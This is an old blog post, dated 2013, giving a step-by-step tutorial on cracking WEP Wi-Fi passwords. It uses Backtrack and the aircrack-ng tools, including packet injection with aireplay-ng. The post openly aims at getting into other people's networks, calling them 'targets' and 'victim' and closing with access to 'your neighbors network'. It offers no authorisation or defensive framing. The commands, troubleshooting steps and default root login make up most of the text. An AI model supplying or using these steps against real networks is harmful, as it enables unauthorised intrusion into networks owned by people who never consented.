Friday 19 April 2013

How To Hack Any Wireless Networks

Hello Hackers,Yes its been very long time but i am back with my tutorial on How To Hack Any Wireless Networks. I cant say that this type of hacking is  100% successful but i am sure that 99% you will be able to make a bulls eye.

So Lets Start our tutorial :




Share OR {might not work}




Things Needed:

Backtrack :  Download Here

Few Notes :

wlan0 = interface
-c = channel
bssid = MAC adress of the target
ssid (-a or -b) = name of the target
filenames (-w) = names of the wep.cap files

Installing Backtrack

1.Download Backtrack
2.Mount the .iso file on a DVD
3.Put the DVD in the your PC and restart
4.When it is restarting rapidly press the ESC button and then choose Boot from CD/DVD

Starting CMD and other...

1.Wait for Backtrack to load it can take up to 10 min or more...
2.When it loads it should look something like this...


3.Type startx and wait for it to load everything up...
4.Open the CMD...it is in the taskbar.

Now How To Hack Wireless:

1.Type in the CMD airmon-ng It will show some "names" (interfaces) like wlan0 , wlan1...Mainly it will be just wlan0...so in other steps il be using wlan0 as the interface but you use your

2.Then type airodump-ng wlan0 Replace wlan0 with your interface

3.Now it will show all the targets around your network you can hack...Choose one target and remember it's BSSID, NAME, CHANNEL and the INTERFACE is still the same as in the beginning in my case wlan0

4.Next type airodump-ng -w wep -c "the targets channel" --bssid "the targets bssid" wlan0 everything is without quotes...replace everything in the quotes with your information and waln0 with your interface...this will lock your target

5.Now that you have locked your victim leave the CMD open and open a new one.Type aireplay-ng -1 0 -a "targets bssid" wlan0 Again replace everything with your information 

6.Now leave that CMD open too (now you have two CMD's) and open a new one (now you have 3 ).Type aireplay-ng -3 -b "targets bssid" wlan0Again fill with your information and without quotes

7.Now on one of the CMD's numbers will start showing those are the amount of packets...wait for it to get to 30000 packets  . Go take a lunch it will take hours

8.When it finally gets to 30000 press CTRL+C.Now type dir that will show the files you got.Then open up new console and type aircrack-ng "filename" Mainly it is gonna be wep-03.cap or other .cap file

9.Now the pass should be cracked and it will show numbers something like 68:89:90 and similar just copy that without the ::: and paste it like a password and you should be in your neighbors network

PROBLEMS
1.Unable to airodump-ng!----well just go into a CMD type ifconfig eth0 up and then type dhclient eth0 and then airmon-ng start "interface" "interface replace with your inter.

2.Not gettin' any targets?---Try using a laptop I got better results when I used my laptop.Also try the ifconfig eth0 up and dhclient eth0

3.Can't start Backtrack?---Ok first chesk did you even choose boot from CD/DVD.Then check if you mounted it on the DVD and not just put the .iso on it! 

4.Asking for login?---As login type root and as password type toor :)

These are main problems any other questions please ask I will try to help

Enjoy!
Any Problems Mention IN comments.........